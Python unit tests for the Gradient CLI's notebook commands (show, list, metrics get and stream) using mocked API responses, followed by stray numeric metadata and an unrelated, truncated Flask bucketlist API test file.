RESPONSE_JSON_WITH_WRONG_API_TOKEN = {"status": 400, "message": "Invalid API token"}
EXPECTED_STDOUT_WITH_WRONG_API_TOKEN = "Failed to fetch data: Invalid API token\n"
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_send_post_request_and_print_notebook_details(self, post_patched):
post_patched.return_value = MockResponse(self.RESPONSE_JSON)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS,
json={"notebookId": "some_id"},
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_send_post_request_and_print_notebook_details_with_tags(self, post_patched):
post_patched.return_value = MockResponse(self.RESPONSE_JSON_WITH_TAGS)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT_WITH_TAGS, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS,
json={"notebookId": "some_id"},
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_send_changed_headers_when_api_key_option_was_used(self, post_patched):
post_patched.return_value = MockResponse(self.RESPONSE_JSON)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND_WITH_API_KEY_USED)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json={"notebookId": "some_id"},
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_read_option_from_yaml_file(self, post_patched, notebooks_show_config_path):
post_patched.return_value = MockResponse(self.RESPONSE_JSON)
command = self.COMMAND_WITH_OPTIONS_FILE_USED[:] + [notebooks_show_config_path]
runner = CliRunner()
result = runner.invoke(cli.cli, command)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json={"notebookId": "some_id"},
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_print_valid_error_message_when_command_was_used_with_invalid_api_token(self, get_patched):
get_patched.return_value = MockResponse(self.RESPONSE_JSON_WITH_WRONG_API_TOKEN, 400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT_WITH_WRONG_API_TOKEN, result.exc_info
get_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json={"notebookId": "some_id"},
params=None)
assert result.exit_code == 0
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_print_valid_error_message_when_no_content_was_received_in_response(self, get_patched):
get_patched.return_value = MockResponse(status_code=400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == "Failed to fetch data\n", result.exc_info
get_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json={"notebookId": "some_id"},
params=None)
assert result.exit_code == 0
class TestNotebooksList(object):
URL = "https://api.paperspace.io/notebooks/getNotebooks"
COMMAND = ["notebooks", "list"]
COMMAND_WITH_FILTERING_BY_TAGS = [
"notebooks", "list",
"--tag", "tag1",
"--tag", "tag2",
]
EXPECTED_STDOUT = """+--------------------+----------+
| Name | ID |
+--------------------+----------+
| job 1 | n1vmfj6x |
| job 1 | nhdf8zf3 |
| My Notebook 123 | nslk5r03 |
| My Notebook 123 | ng9a3tp4 |
| some_name | ngw7piq9 |
| some_notebook_name | n8h0d5lf |
| some_notebook_name | nl0b6cn0 |
| some_notebook_name | njmq1zju |
| some_notebook_name | nfcuwqu5 |
+--------------------+----------+
"""
RESPONSE_JSON = example_responses.NOTEBOOKS_LIST_RESPONSE_JSON
COMMAND_WITH_API_KEY_USED = ["notebooks", "list", "--apiKey", "some_key"]
COMMAND_WITH_OPTIONS_FILE_USED = ["notebooks", "list", "--optionsFile", ] # path added in test
EXPECTED_FILTERS = {
"filter": {
"where": {
"dtDeleted": None,
},
"limit": 20,
"order": "jobId desc",
"offset": 0,
},
}
RESPONSE_JSON_WITH_WRONG_API_TOKEN = {"status": 400, "message": "Invalid API token"}
EXPECTED_STDOUT_WITH_WRONG_API_TOKEN = "Failed to fetch data: Invalid API token\n"
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_send_post_request_and_print_notebook_details(self, post_patched):
post_patched.return_value = MockResponse(self.RESPONSE_JSON)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS,
json=None,
params=mock.ANY)
params = post_patched.call_args.kwargs["params"]
filter_params = params["filter"]
filter_params = json.loads(filter_params)
assert filter_params == self.EXPECTED_FILTERS
assert "tagFilter[0]" not in params
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_send_post_request_and_print_notebook_details_when_filtering_by_tags(self, post_patched):
post_patched.return_value = MockResponse(self.RESPONSE_JSON)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND_WITH_FILTERING_BY_TAGS)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS,
json=None,
params=mock.ANY)
params = post_patched.call_args.kwargs["params"]
filter_params = params["filter"]
filter_params = json.loads(filter_params)
assert filter_params == self.EXPECTED_FILTERS
assert "tagFilter[0]" in params
assert params["tagFilter[0]"] in ("tag1", "tag2")
assert params["tagFilter[1]"] in ("tag1", "tag2")
assert params["tagFilter[0]"] != params["tagFilter[1]"]
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_send_changed_headers_when_api_key_option_was_used(self, get_patched):
get_patched.return_value = MockResponse(self.RESPONSE_JSON)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND_WITH_API_KEY_USED)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
get_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=None,
params=mock.ANY)
params = get_patched.call_args.kwargs["params"]
filter_params = params["filter"]
filter_params = json.loads(filter_params)
assert filter_params == self.EXPECTED_FILTERS
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_read_option_from_yaml_file(self, get_patched, notebooks_list_config_path):
get_patched.return_value = MockResponse(self.RESPONSE_JSON)
command = self.COMMAND_WITH_OPTIONS_FILE_USED[:] + [notebooks_list_config_path]
runner = CliRunner()
result = runner.invoke(cli.cli, command)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
get_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=None,
params=mock.ANY)
params = get_patched.call_args.kwargs["params"]
filter_params = params["filter"]
filter_params = json.loads(filter_params)
assert filter_params == self.EXPECTED_FILTERS
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_print_valid_error_message_when_command_was_used_with_invalid_api_token(self, get_patched):
get_patched.return_value = MockResponse(self.RESPONSE_JSON_WITH_WRONG_API_TOKEN, 400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT_WITH_WRONG_API_TOKEN, result.exc_info
get_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=None,
params=mock.ANY)
params = get_patched.call_args.kwargs["params"]
filter_params = params["filter"]
filter_params = json.loads(filter_params)
assert filter_params == self.EXPECTED_FILTERS
assert result.exit_code == 0
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_print_valid_error_message_when_no_content_was_received_in_response(self, get_patched):
get_patched.return_value = MockResponse(status_code=400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == "Failed to fetch data\n", result.exc_info
get_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=None,
params=mock.ANY)
params = get_patched.call_args.kwargs["params"]
filter_params = params["filter"]
filter_params = json.loads(filter_params)
assert filter_params == self.EXPECTED_FILTERS
assert result.exit_code == 0
class TestNotebooksMetricsGetCommand(object):
GET_NOTEBOOK_URL = "https://api.paperspace.io/notebooks/getNotebook"
GET_METRICS_URL = "https://aws-testing.paperspace.io/metrics/api/v1/range"
BASIC_OPTIONS_COMMAND = [
"notebooks", "metrics", "get",
"--id", "ngw7piq9",
]
ALL_OPTIONS_COMMAND = [
"notebooks", "metrics", "get",
"--id", "ngw7piq9",
"--metric", "gpuMemoryFree",
"--metric", "gpuMemoryUsed",
"--interval", "20s",
"--start", "2020-04-01",
"--end", "2020-04-02 21:37:00",
"--apiKey", "some_key",
]
FULL_OPTIONS_COMMAND_WITH_OPTIONS_FILE = [
"notebooks", "metrics", "get",
"--optionsFile", # path added in test,
]
GET_NOTEBOOK_REQUEST_JSON = {"notebookId": "ngw7piq9"}
BASIC_COMMAND_GET_METRICS_REQUEST_PARAMS = {
"start": "2019-09-03T11:10:36Z",
"handle": "ngw7piq9",
"interval": "30s",
"charts": "cpuPercentage,memoryUsage",
"objecttype": "notebook",
}
ALL_COMMANDS_GET_METRICS_REQUEST_PARAMS = {
"start": "2020-04-01T00:00:00Z",
"handle": "ngw7piq9",
"interval": "20s",
"charts": "gpuMemoryFree,gpuMemoryUsed",
"objecttype": "notebook",
"end": "2020-04-02T21:37:00Z",
}
GET_NOTEBOOK_RESPONSE_JSON = example_responses.NOTEBOOK_GET_RESPONSE
GET_METRICS_RESPONSE_JSON = example_responses.NOTEBOOKS_METRICS_GET_RESPONSE
EXPECTED_STDOUT = """{
"cpuPercentage": {
"npmnnm6e": [
{
"time_stamp": 1587993000,
"value": "0"
},
{
"time_stamp": 1587993030,
"value": "0"
},
{
"time_stamp": 1587993060,
"value": "0"
},
{
"time_stamp": 1587993090,
"value": "0"
},
{
"time_stamp": 1587993120,
"value": "0"
},
{
"time_stamp": 1587993150,
"value": "0"
},
{
"time_stamp": 1587993180,
"value": "0"
},
{
"time_stamp": 1587993210,
"value": "0"
},
{
"time_stamp": 1587993240,
"value": "0"
},
{
"time_stamp": 1587993270,
"value": "0"
},
{
"time_stamp": 1587993300,
"value": "0"
},
{
"time_stamp": 1587993330,
"value": "0"
},
{
"time_stamp": 1587993360,
"value": "0"
}
]
},
"memoryUsage": {
"npmnnm6e": [
{
"time_stamp": 1587992970,
"value": "0"
},
{
"time_stamp": 1587993000,
"value": "782336"
},
{
"time_stamp": 1587993030,
"value": "782336"
},
{
"time_stamp": 1587993060,
"value": "782336"
},
{
"time_stamp": 1587993090,
"value": "782336"
},
{
"time_stamp": 1587993120,
"value": "782336"
},
{
"time_stamp": 1587993150,
"value": "782336"
},
{
"time_stamp": 1587993180,
"value": "782336"
},
{
"time_stamp": 1587993210,
"value": "782336"
},
{
"time_stamp": 1587993240,
"value": "782336"
},
{
"time_stamp": 1587993270,
"value": "782336"
},
{
"time_stamp": 1587993300,
"value": "782336"
},
{
"time_stamp": 1587993330,
"value": "782336"
},
{
"time_stamp": 1587993360,
"value": "782336"
}
]
}
}
"""
EXPECTED_STDOUT_WHEN_INVALID_API_KEY_WAS_USED = "Failed to fetch data: Invalid API token\n"
EXPECTED_STDOUT_WHEN_EXPERIMENT_WAS_NOT_FOUND = "Failed to fetch data: Not found. " \
"Please contact support@paperspace.com for help.\n"
EXPECTED_STDOUT_WHEN_NO_METRICS_WERE_FOUND = """{
"cpuPercentage": null,
"memoryUsage": null
}
"""
EXPECTED_STDOUT_WHEN_ERROR_CODE_WAS_RETURNED_WITHOUT_ERROR_MESSAGE = "Failed to fetch data\n"
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_read_all_available_metrics_when_metrics_get_command_was_used_with_basic_options(self, get_patched):
get_patched.side_effect = [
MockResponse(self.GET_NOTEBOOK_RESPONSE_JSON),
MockResponse(self.GET_METRICS_RESPONSE_JSON),
]
runner = CliRunner()
result = runner.invoke(cli.cli, self.BASIC_OPTIONS_COMMAND)
assert json.loads(result.output.strip()) == json.loads(self.EXPECTED_STDOUT.strip()), \
str(result.output) + str(result.exc_info)
get_patched.assert_has_calls(
[
mock.call(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS,
),
mock.call(
self.GET_METRICS_URL,
json=None,
params=self.BASIC_COMMAND_GET_METRICS_REQUEST_PARAMS,
headers=EXPECTED_HEADERS,
),
]
)
assert result.exit_code == 0, result.exc_info
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_read_metrics_when_metrics_get_command_was_used_with_all_options(self, get_patched):
get_patched.side_effect = [
MockResponse(self.GET_NOTEBOOK_RESPONSE_JSON),
MockResponse(self.GET_METRICS_RESPONSE_JSON),
]
runner = CliRunner()
result = runner.invoke(cli.cli, self.ALL_OPTIONS_COMMAND)
# comparing objects instead of strings because Py2 and Py3 produce slightly different outputs
assert json.loads(result.output.strip()) == json.loads(self.EXPECTED_STDOUT.strip()), result.exc_info
get_patched.assert_has_calls(
[
mock.call(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
),
mock.call(
self.GET_METRICS_URL,
json=None,
params=self.ALL_COMMANDS_GET_METRICS_REQUEST_PARAMS,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
),
]
)
assert result.exit_code == 0, result.exc_info
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_read_metrics_when_metrics_get_was_executed_and_options_file_was_used(
self, get_patched, notebooks_metrics_get_config_path):
get_patched.side_effect = [
MockResponse(self.GET_NOTEBOOK_RESPONSE_JSON),
MockResponse(self.GET_METRICS_RESPONSE_JSON),
]
command = self.FULL_OPTIONS_COMMAND_WITH_OPTIONS_FILE[:] + [notebooks_metrics_get_config_path]
runner = CliRunner()
result = runner.invoke(cli.cli, command)
# comparing objects instead of strings because Py2 and Py3 produce slightly different outputs
assert json.loads(result.output.strip()) == json.loads(self.EXPECTED_STDOUT.strip()), result.exc_info
get_patched.assert_has_calls(
[
mock.call(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
),
mock.call(
self.GET_METRICS_URL,
json=None,
params=self.ALL_COMMANDS_GET_METRICS_REQUEST_PARAMS,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
),
]
)
assert result.exit_code == 0, result.exc_info
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_print_valid_error_message_when_invalid_api_key_was_used(self, get_patched):
get_patched.return_value = MockResponse({"status": 400, "message": "Invalid API token"},
status_code=403)
runner = CliRunner()
result = runner.invoke(cli.cli, self.ALL_OPTIONS_COMMAND)
assert result.output == self.EXPECTED_STDOUT_WHEN_INVALID_API_KEY_WAS_USED, result.exc_info
get_patched.assert_called_once_with(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
)
assert result.exit_code == 0, result.exc_info
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_print_valid_error_message_when_deployment_was_not_found(self, get_patched):
get_patched.side_effect = [
MockResponse({"error": {"name": "ApplicationError", "status": 404,
"message": "Not found. Please contact support@paperspace.com for help."}},
status_code=404),
]
runner = CliRunner()
result = runner.invoke(cli.cli, self.ALL_OPTIONS_COMMAND)
assert result.output == self.EXPECTED_STDOUT_WHEN_EXPERIMENT_WAS_NOT_FOUND, result.exc_info
get_patched.assert_has_calls(
[
mock.call(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
),
]
)
assert result.exit_code == 0, result.exc_info
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_print_valid_message_when_was_no_metrics_were_returned(self, get_patched):
get_patched.side_effect = [
MockResponse(self.GET_NOTEBOOK_RESPONSE_JSON),
MockResponse(example_responses.NOTEBOOKS_METRICS_GET_RESPONSE_WHEN_NO_METRICS_WERE_FOUND),
]
runner = CliRunner()
result = runner.invoke(cli.cli, self.ALL_OPTIONS_COMMAND)
assert json.loads(result.output.strip()) == json.loads(self.EXPECTED_STDOUT_WHEN_NO_METRICS_WERE_FOUND.strip()) \
, str(result.output) + str(result.exc_info)
get_patched.assert_has_calls(
[
mock.call(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
),
mock.call(
self.GET_METRICS_URL,
json=None,
params=self.ALL_COMMANDS_GET_METRICS_REQUEST_PARAMS,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
),
]
)
assert result.exit_code == 0, result.exc_info
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_print_valid_error_message_when_error_code_was_returned_without_error_message(self, get_patched):
get_patched.side_effect = [
MockResponse(self.GET_NOTEBOOK_RESPONSE_JSON),
MockResponse(status_code=500),
]
runner = CliRunner()
result = runner.invoke(cli.cli, self.ALL_OPTIONS_COMMAND)
assert result.output == self.EXPECTED_STDOUT_WHEN_ERROR_CODE_WAS_RETURNED_WITHOUT_ERROR_MESSAGE, result.exc_info
get_patched.assert_has_calls(
[
mock.call(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
),
mock.call(
self.GET_METRICS_URL,
json=None,
params=self.ALL_COMMANDS_GET_METRICS_REQUEST_PARAMS,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
),
]
)
assert result.exit_code == 0, result.exc_info
class TestExperimentsMetricsStreamCommand(object):
GET_NOTEBOOK_URL = "https://api.paperspace.io/notebooks/getNotebook"
GET_METRICS_URL = "https://aws-testing.paperspace.io/metrics/api/v1/stream"
BASIC_OPTIONS_COMMAND = [
"notebooks", "metrics", "stream",
"--id", "ngw7piq9",
]
ALL_OPTIONS_COMMAND = [
"notebooks", "metrics", "stream",
"--id", "ngw7piq9",
"--metric", "gpuMemoryFree",
"--metric", "gpuMemoryUsed",
"--interval", "20s",
"--apiKey", "some_key",
]
ALL_OPTIONS_COMMAND_WITH_OPTIONS_FILE = [
"notebooks", "metrics", "stream",
"--optionsFile", # path added in test,
]
GET_NOTEBOOK_REQUEST_JSON = {"notebookId": "ngw7piq9"}
BASIC_COMMAND_CHART_DESCRIPTOR = '{"chart_names": ["cpuPercentage", "memoryUsage"], "handles": ["ngw7piq9"' \
'], "object_type": "notebook", "poll_interval": "30s"}'
ALL_COMMANDS_CHART_DESCRIPTOR = '{"chart_names": ["gpuMemoryFree", "gpuMemoryUsed"], "handles": ["ngw7piq9' \
'"], "object_type": "notebook", "poll_interval": "20s"}'
GET_NOTEBOOK_RESPONSE_JSON = example_responses.NOTEBOOK_GET_RESPONSE
GET_NOTEBOOK_RESPONSE_JSON_WHEN_NOTEBOOK_NOT_FOUND = {
"error": {
"name": "ApplicationError",
"status": 404,
"message": "Not found. Please contact support@paperspace.com for help.",
},
}
EXPECTED_TABLE_1 = """+----------+---------------+-------------+
| Pod | cpuPercentage | memoryUsage |
+----------+---------------+-------------+
| nrwed38p | | 54013952 |
+----------+---------------+-------------+
"""
EXPECTED_TABLE_2 = """+----------+----------------------+-------------+
| Pod | cpuPercentage | memoryUsage |
+----------+----------------------+-------------+
| nrwed38p | 0.006907773333334353 | 54013952 |
+----------+----------------------+-------------+
"""
EXPECTED_TABLE_3 = """+----------+----------------------+-------------+
| Pod | cpuPercentage | memoryUsage |
+----------+----------------------+-------------+
| nrwed38p | 0.006907773333334353 | 12345667 |
+----------+----------------------+-------------+
"""
ALL_OPTIONS_EXPECTED_TABLE_1 = """+----------+---------------+---------------+
| Pod | gpuMemoryFree | gpuMemoryUsed |
+----------+---------------+---------------+
| nrwed38p | 1234 | |
+----------+---------------+---------------+
"""
ALL_OPTIONS_EXPECTED_TABLE_2 = """+----------+---------------+---------------+
| Pod | gpuMemoryFree | gpuMemoryUsed |
+----------+---------------+---------------+
| nrwed38p | 1234 | |
+----------+---------------+---------------+
"""
ALL_OPTIONS_EXPECTED_TABLE_3 = """+----------+---------------+---------------+
| Pod | gpuMemoryFree | gpuMemoryUsed |
+----------+---------------+---------------+
| nrwed38p | 2345 | 32 |
+----------+---------------+---------------+
"""
EXPECTED_STDOUT_WHEN_INVALID_API_KEY_WAS_USED = "Failed to fetch data: Incorrect API Key provided\nForbidden\n"
EXPECTED_STDOUT_WHEN_DEPLOYMENT_WAS_NOT_FOUND = "Failed to fetch data: Not found. Please contact " \
"support@paperspace.com for help.\n"
@mock.patch("gradient.api_sdk.repositories.common.websocket.create_connection")
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_read_all_available_metrics_when_metrics_get_command_was_used_with_basic_options(
self, get_patched, create_ws_connection_patched,
basic_options_metrics_stream_websocket_connection_iterator):
get_patched.return_value = MockResponse(self.GET_NOTEBOOK_RESPONSE_JSON)
ws_connection_instance_mock = mock.MagicMock()
ws_connection_instance_mock.__iter__ = basic_options_metrics_stream_websocket_connection_iterator
create_ws_connection_patched.return_value = ws_connection_instance_mock
runner = CliRunner()
result = runner.invoke(cli.cli, self.BASIC_OPTIONS_COMMAND)
assert self.EXPECTED_TABLE_1 in result.output, result.exc_info
assert self.EXPECTED_TABLE_2 in result.output, result.exc_info
assert self.EXPECTED_TABLE_3 in result.output, result.exc_info
get_patched.assert_called_once_with(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS,
)
ws_connection_instance_mock.send.assert_called_once_with(self.BASIC_COMMAND_CHART_DESCRIPTOR)
assert result.exit_code == 0, result.exc_info
@mock.patch("gradient.api_sdk.repositories.common.websocket.create_connection")
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_read_metrics_when_metrics_get_command_was_used_with_all_options(
self, get_patched, create_ws_connection_patched,
all_options_metrics_stream_websocket_connection_iterator):
get_patched.return_value = MockResponse(self.GET_NOTEBOOK_RESPONSE_JSON)
ws_connection_instance_mock = mock.MagicMock()
ws_connection_instance_mock.__iter__ = all_options_metrics_stream_websocket_connection_iterator
create_ws_connection_patched.return_value = ws_connection_instance_mock
runner = CliRunner()
result = runner.invoke(cli.cli, self.ALL_OPTIONS_COMMAND)
assert self.ALL_OPTIONS_EXPECTED_TABLE_1 in result.output, result.exc_info
assert self.ALL_OPTIONS_EXPECTED_TABLE_2 in result.output, result.exc_info
assert self.ALL_OPTIONS_EXPECTED_TABLE_3 in result.output, result.exc_info
get_patched.assert_called_once_with(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
)
ws_connection_instance_mock.send.assert_called_once_with(self.ALL_COMMANDS_CHART_DESCRIPTOR)
assert result.exit_code == 0, result.exc_info
@mock.patch("gradient.api_sdk.repositories.common.websocket.create_connection")
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_read_metrics_when_metrics_get_was_executed_and_options_file_was_used(
self, get_patched, create_ws_connection_patched,
all_options_metrics_stream_websocket_connection_iterator,
notebooks_metrics_stream_config_path):
get_patched.return_value = MockResponse(self.GET_NOTEBOOK_RESPONSE_JSON)
ws_connection_instance_mock = mock.MagicMock()
ws_connection_instance_mock.__iter__ = all_options_metrics_stream_websocket_connection_iterator
create_ws_connection_patched.return_value = ws_connection_instance_mock
command = self.ALL_OPTIONS_COMMAND_WITH_OPTIONS_FILE[:] + [notebooks_metrics_stream_config_path]
runner = CliRunner()
result = runner.invoke(cli.cli, command)
assert self.ALL_OPTIONS_EXPECTED_TABLE_1 in result.output, result.exc_info
assert self.ALL_OPTIONS_EXPECTED_TABLE_2 in result.output, result.exc_info
assert self.ALL_OPTIONS_EXPECTED_TABLE_3 in result.output, result.exc_info
get_patched.assert_called_once_with(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
)
ws_connection_instance_mock.send.assert_called_once_with(self.ALL_COMMANDS_CHART_DESCRIPTOR)
assert result.exit_code == 0, result.exc_info
@mock.patch("gradient.api_sdk.repositories.common.websocket.create_connection")
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_print_valid_error_message_when_invalid_api_key_was_used(
self, get_patched, create_ws_connection_patched):
get_patched.return_value = MockResponse({"status": 400, "message": "Invalid API token"}, 400)
runner = CliRunner()
result = runner.invoke(cli.cli, self.ALL_OPTIONS_COMMAND)
assert "Failed to fetch data: Invalid API token\n" == result.output, result.exc_info
get_patched.assert_called_once_with(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
)
create_ws_connection_patched.assert_not_called()
assert result.exit_code == 0, result.exc_info
@mock.patch("gradient.api_sdk.repositories.common.websocket.create_connection")
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_print_valid_error_message_when_deployment_was_not_found(
self, get_patched, create_ws_connection_patched):
get_patched.return_value = MockResponse(self.GET_NOTEBOOK_RESPONSE_JSON_WHEN_NOTEBOOK_NOT_FOUND, 404)
runner = CliRunner()
result = runner.invoke(cli.cli, self.ALL_OPTIONS_COMMAND)
assert result.output == self.EXPECTED_STDOUT_WHEN_DEPLOYMENT_WAS_NOT_FOUND, result.exc_info
get_patched.assert_called_once_with(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
)
create_ws_connection_patched.assert_not_called()
assert result.exit_code == 0, result.exc_info
| 43.223729
| 127
| 0.588942
| 6,532
| 63,755
| 5.37523
| 0.055726
| 0.023355
| 0.023696
| 0.033608
| 0.893281
| 0.877474
| 0.856968
| 0.825382
| 0.795022
| 0.775626
| 0
| 0.023166
| 0.301263
| 63,755
| 1,474
| 128
| 43.253053
| 0.764995
| 0.00549
| 0
| 0.701039
| 0
| 0
| 0.221753
| 0.083414
| 0
| 0
| 0
| 0.000678
| 0.115108
| 1
| 0.041567
| false
| 0.001599
| 0.006395
| 0
| 0.135891
| 0.023181
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
364c028538c1c44b737307d6bc409ccae5818a66
| 22,877
|
py
|
Python
|
tests/test_bucketlist.py
|
faithngetich/Buckectlist
|
f7503d2de93d733a8ef44a8c36d9410d40fea4e3
|
[
"MIT"
] | null | null | null |
tests/test_bucketlist.py
|
faithngetich/Buckectlist
|
f7503d2de93d733a8ef44a8c36d9410d40fea4e3
|
[
"MIT"
] | 1
|
2017-05-27T19:52:14.000Z
|
2017-05-29T08:52:50.000Z
|
tests/test_bucketlist.py
|
faithngetich/Buckectlist
|
f7503d2de93d733a8ef44a8c36d9410d40fea4e3
|
[
"MIT"
] | null | null | null |
import os
import json
import unittest
from flask_sqlalchemy import SQLAlchemy
from flask_testing import TestCase
from app.models import db
from app import create_app
from app.config import Config
from app.models.models import User, BucketList, Item
TEST_DB = 'test.db'
class TestDevelopmentConfig(unittest.TestCase):
def setUp(self):
self.app = create_app('test')
self.app_context = self.app.app_context()
self.app_context.push()
db.create_all()
self.client = self.app.test_client()
def tearDown(self):
db.session.remove()
db.drop_all()
self.app_context.pop()
def test_add_buckectlist(self):
# binds the app with the current context
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name='Travel to bermuda'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['message'] == "Bucketlist successfully created!")
self.assertEqual(response.status_code, 201)
def test_cannot_access_resource_if_not_authenticated(self):
response = self.client.post('/api/v1/bucketlists',
content_type="application/json",)
self.assertEqual(response.status_code, 401)
def test_create_bucketlist_without_name(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['message'] == "You did not include a bucketlist name.")
self.assertEqual(response.status_code, 400)
def test_add_buckectlist(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
